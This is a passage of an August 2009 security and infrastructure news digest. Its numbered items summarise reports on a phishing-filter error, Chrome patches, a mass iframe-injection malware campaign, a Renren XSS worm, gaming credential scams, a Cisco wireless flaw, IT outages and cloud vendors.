38. August 26, The Register – (International) MS phishing filter blacklists everything. A wide range of uk.com websites were misclassified as malign by anti-phishing technology built into the latest versions of Microsoft’s browser software on August 26. Microsoft’s SmartScreen Filter, which is built into IE7 and IE8, labelled every uk.com top level domain site as a phishing site following what appears to be a dodgy rule change applied overnight. Many of the sites have been unblocked, but many others remain labelled as potentially dangerous to surfers visiting the site running Microsoft’s consumer protection technology. The issue created a headache for UK ISPs, with hosting customers calling up wondering what the heck was going on. An ISP source who was the first to tell The Register about the problem said that its phones are “red hot” from calls about the issue. Microsoft responded to The Register’s queries promptly by saying it was investigating the issue. CentralNic, registrar for uk.com domains, published a statement saying Microsoft has promised to resolve the problem within two hours, by 1330 BST. “We have been made aware that the Microsoft SmartScreen filter included with Internet Explorer 8 is erroneously marking some domain names as being unsafe,” it said. “The most likely explanation is that a genuinely unsafe website under one of our suffixes was reported to Microsoft, but they incorrectly added all the domains under that suffix to their list of unsafe websites. Source: http://www.theregister.co.uk/2009/08/26/ms_phishing_filter/


39. August 25, CNET News – (International) Google patches severe Chrome vulnerabilities. Google has fixed two high-severity vulnerabilities in the stable version of its Chrome browser that could have let an attacker remotely take over a person’s computer. With one attack on Google’s V8 JavaScript engine, malicious JavaScript on a Web site could let an attacker gain access to sensitive data or run arbitrary code on the computer within a Chrome protected area called the sandbox, Google said in a blog post Tuesday. With the other, a page with XML-encoded information could cause a browser tab crash that could let an attacker run arbitrary code within the sandbox. Chrome 2.0.172.43 (click to download for Windows) fixes the issues and another medium-severity issue. Once Chrome is installed, it retrieves updates automatically and applies them when people restart the browser. Google won’t release details of the vulnerabilities until “a majority of users are up to date with the fix,” a engineering program manager said in the blog post. Source: http://news.cnet.com/8301-30685_3-10317320-264.html


40. August 25, Softpedia – (International) Over 62,000 new URLs serving exploit cocktail. Security researchers advise that a new mass compromise attack is underway and has affected over 62,000 URLs to date. A rogue IFrame injected into the compromised Web pages loads a cocktail of exploits and malware from other domains. Web security company ScanSafe has been monitoring this new threat and advises that the infection pattern is a hidden IFrame loading JavaScript content from a domain called a0v.org. A Google search for “script src= reveals 62,100 results. A senior security researcher at ScanSafe, has told The Register that the infections are the result of SQL injection attacks. The x.js called from a0v.org has the role of loading exploits from a number of seven other domain names. At the moment of writing this article, Google’s Safe Browsing was tagging a0v.org as malicious. “The malware hosting domains were registered on or after August 3, 2009 and include: ahthja.info, gaehh.info, htsrh.info, car741.info, game163.info, car963.info, and game158.info. The most prolific observed by ScanSafe thus far has been ahthja.info,” the researcher writes on the company’s blog. If exploitation is successful, several malware installers are dropped and executed onto the victim’s computer as drive-by downloads. The security researcher warns that “post infection, additional malware may also be downloaded” from a different host. The exploits target vulnerabilities in popular software, including Internet Explorer, Mozilla Firefox, Adobe Flash Player, Adobe Reader and Acrobat or avast! Antivirus. AV detection rates for the malicious executables downloaded during the attack range from poor to moderate on Virustotal. Source: http://news.softpedia.com/news/Over-62-000-New-URLs-Serving-Exploits-Cocktail-120006.shtml


41. August 25, Softpedia – (International) New Chinese social networking worm discovered. Security researchers warn that a new worm has been spotted on Chinese social networking website Renren.com. The worm masquerades a flash music video of Pink Floyd’s Wish You Were Here and spreads by exploiting a cross-site scripting hole. The message has the title “Pink Floyd – Wish You Were Here” and it contains a maliciously crafted Flash component loaded with AllowScriptAccess=“always” parameter. According to Adobe “When AllowScriptAccess is ‘always’, the SWF file can communicate with the HTML page in which it is embedded even when the SWF file is from a different domain than the HTML page.” The flash file is used to execute the JavaScript code present in the message body and load a script called evil.js from an external domain. As researchers indicate, the JavaScript code is used to exploit a cross-site scripting (XSS) flaw present in the website and spread the worm through its API. Social networking worms have been increasing in number for the past few years, suggesting that these new platforms are good hunting grounds for cybercrooks. Boris Lau, a virus researcher at antivirus vendor Sophos, which detects this new threat as W32/Pinkren-A, points out that “this is same technique used back in 2007 by the Okurt worm.” Renren is a Facebook-like website very successful in China. Such local threats are important to the Westerners as well, because Chinese computers compromised by worms like these will join to form large botnets. These armies of zombie computers will then be used to send spam and perform distributed denial of service attacks globally. Source: http://news.softpedia.com/news/New-Chinese-Social-Networking-Worm-Discovered-120021.shtml


42. August 24, The Register – (International) Scammers step up attacks on Warcraft players. A researcher from anti-virus firm Webroot has written how official forums offered by WoW creator Blizzard are being used to spread links that lead to malware that steals passwords and other game credentials. The scam employs the common technique of telling visitors that their Adobe Flash player needs to be updated and then offering a malicious trojan instead of the real installation file. Elsewhere, phishers are churning out emails that purport to be official communications from Blizzard, according to researchers from security provider Sophos. The emails claim the game maker is launching a new service and invites them to click on a link for a free sneak peak. The resulting website, in turn, phishes user credentials. The attack outbreaks come a few weeks after Blizzard issued an update for Warcraft III that fixed a gaping hole that could lead to the complete hijacking of machines running the real-time strategy game. According to a Webroot researcher it was exploited simply by getting vulnerable victims to join a custom game hosted with booby-trapped maps. Attackers targeted the vulnerability in a game called DotA, or Defense of the Ancients, by creating fake maps that used the same file configurations as legitimate custom maps. “What makes this exploit particularly nasty is the fact that your PC gets infected the moment you join a game where the infected DotA map is in use,” the researcher wrote. “Once downloaded, the game automatically unpacks the infected map and executes the malicious code.” Source: http://www.theregister.co.uk/2009/08/24/world_of_warcraft_attacks/

Communications Sector

43. August 26, Information Week – (International) Dell launches 10 gigabit ethernet in storage array. Dell on August 25 introduced an upgrade of its Dell/EMC CX4 storage arrays that includes a 10 Gigabit Ethernet, which the vendor says addresses the input/output needs for the growing compute density of virtualized environments within data centers. The latest version of the CX4 arrays contains an UltraFlex Modular I/O that enables customers to add ports supporting 8 Gb and 4 Gb Fibre Channel and 1 Gb and 10 Gb iSCSI. The latter enables companies to consolidate “stranded servers” onto an existing storage-area network, support more virtual servers and aggregate multiple 1 Gb iSCSI connections to fewer 10 Gb ones, Dell said. “Ethernet is increasingly being chosen as the networking technology for storage as customers look to consolidate and virtualize their data centers,” the vice president of enterprise storage and networking at Dell, said in a statement. “With a 10 gigabit option and its inherent advantages in virtualized environments, Ethernet’s case gets even stronger as the most simple and capable networking fabric.” In addition, Dell has added virtualization-aware Navisphere management software that provides automatic discovery of virtual machines and VMWare ESX servers, virtual-to-physical machine mapping and advanced search for VMs. Finally, the arrays upgrade includes drive spin-down as a standard feature to help reduce power and cooling requirements. The feature enables users to set policies for drives to power down when not in use. Source: http://www.informationweek.com/news/storage/virtualization/showArticle.jhtml?articleID=219401489


44. August 26, Wired News – (International) Cutbacks could be causing IT outages. When eBay’s PayPal unit suffered a worldwide outage early this month, Sailrite Enterprises Inc., a sailing supply company based in Churubusco, Ind., lost its critical customer payment services for six hours.The next day, August 4, PayPal’s services failed Sailrite again, this time for about an hour, according to the a vice president at Sailrite. He posted a blunt message on PayPal’s blog site: “This is not acceptable.” In an e-mail, San Jose-based PayPal blamed the outage on a problem with a “back-end router” that was complicated by a failure in the company’s redundancy measures. The PayPal electronic payment system is one of many Internet-based services that have been hit with outages. And based on news reports, the number of such incidents appears to have been increasing in recent months, analysts said. They cited shutdowns of the Google Apps software hosted by Google, outages at data centers run by Rackspace Hosting Inc. and a distributed denial-of-service attack on Twitter. Observers pointed to several possible reasons for the apparent uptick in online outages, including IT budget and personnel cutbacks, increasing corporate dependence on hosted applications, and bad luck. The chief security strategist at Citrix Systems in Fort Lauderdale, Florida, said he wonders whether a two-hour shutdown of Cisco Systems’s Web site this month “would [have] happened a few years agoĆ¢_¦ when they had multiple people checking every single change.” Cisco blamed the outage on human error. IT staff cuts spurred by the economy are likely to continue throughout the remainder of the year. According to a survey of 300 IT center managers last year by the Association for Computer Operations Management, half of all data centers were planning to cut 2009 budgets by an average of 15%. Respondents at 14% of those companies said the cuts would include layoffs of IT staffers. A executive director of Uptime Institute Inc., a data center engineering and consulting firm, said such budget and personnel cutbacks can prove disastrous to IT. “We’re not doing the maintenance we should be doing, and when you don’t do maintenance, you increase the probability of catastrophic failure,” he said. The executive added that energy-efficiency efforts may be prompting data centers to cut back on redundant equipment and run their systems harder, exposing equipment flaws. Source: http://www.wired.com/epicenter/2009/08/cutbacks-could-be-causing-it-outages/


45. August 25, SCMagazine – (International) Wireless flaw could let hackers breach wired network. Researchers at a security firm on August 25 disclosed a vulnerability within the Cisco wireless framework that could offer intruders a gaping entryway into an organization’s network. The AirMagnet Intrusion Research Team said it discovered an exploit, known as “skyjacking,” which could enable someone, either on purpose or by accident, to take control of a wireless access point (AP) and point it to an outside Cisco controller. “Access points do not normally get connected to the wrong controller,” the AirMagnet’s director of product management told SCMagazineUS.com on August 24. “If [one does], you have a big problem. We’ve uncovered a way where, by accident or design, an access point could get connected to the wrong controller or a controller that’s not in its network.” By doing that, attackers could assume control of a legitimate access point, which not only gives them visibility into relayed data but also could open the gates into an organization’s wired network. “You’ve taken an approved AP and turned it rogue,” the director said. “At this point, you’ve got the keys to the castle. You have an authorized wireless connection into a wired network. Not only would you be able to see everything that access point does but, more importantly, you’ll have accessed your way into the wired part of that network...So you’ve got a full breach.” Researchers at AirMagnet, which has been acquired by Fluke Networks, also detected another problem in the Cisco network. Leveraging Cisco’s Over-the-Air Provisioning feature, engineers found that data belonging to wireless controllers, such as IP and media access control (MAC) addresses, is inadvertently broadcast unencrypted. With that information, attackers can target these devices, which support large numbers of access points, with attacks such as denial-of-service attempts, the AirMagnet director said. In addition, intruders can use the data to learn more about a company’s network topology. http://www.scmagazineus.com/wireless-flaw-could-let-hackers-breach-wired-network/article/147241/


46. August 25, Datamation – (International) 85 cloud computing vendors shaping the emerging cloud. The era of cloud computing is dawning amid great fanfare, supported by mountains of cash and reams of hype. Whether this change is positive is debatable, very real concerns plague cloud computing, but the tech industry has decided: the cloud is king. Just as the hulking mainframes of the 1960s were replaced by client server systems in the 1980s, the in-house datacenter is now shifting toward an externally-based model. Vendors of every size are maneuvering, targeting this new market. The U.S. government just unveiled plans to start offering cloud computing services to federal agencies. Currently, many vendors are slapping the term ‘cloud’ on their product. Cloud computing allows for access of software over the Web, instead of on a hard drive. Software might sit on a server in New York or New Delhi or New Haven, Connecticut. Or maybe that app combines services from apps that reside in New York and New Delhi, with an add-on from a New Haven provider. Microsoft, with its Azure cloud initiative, is quietly investing massively in leviathan datacenters across the country to host its cloud offering. IBM’s cloud push benefits greatly from the company’s global stance and deep focus on services. Google’s cloud strategy is supremely well positioned, with a well-tuned international server network and its Web-based Chrome OS. Some industry wags deride Amazon as the utility cloud provider whose offering isn’t differentiated enough, yet it keeps growing. Source: http://itmanagement.earthweb.com/entdev/article.php/3835941/85-Cloud-Computing-Vendors-Shaping-the-Emerging-Cloud.htm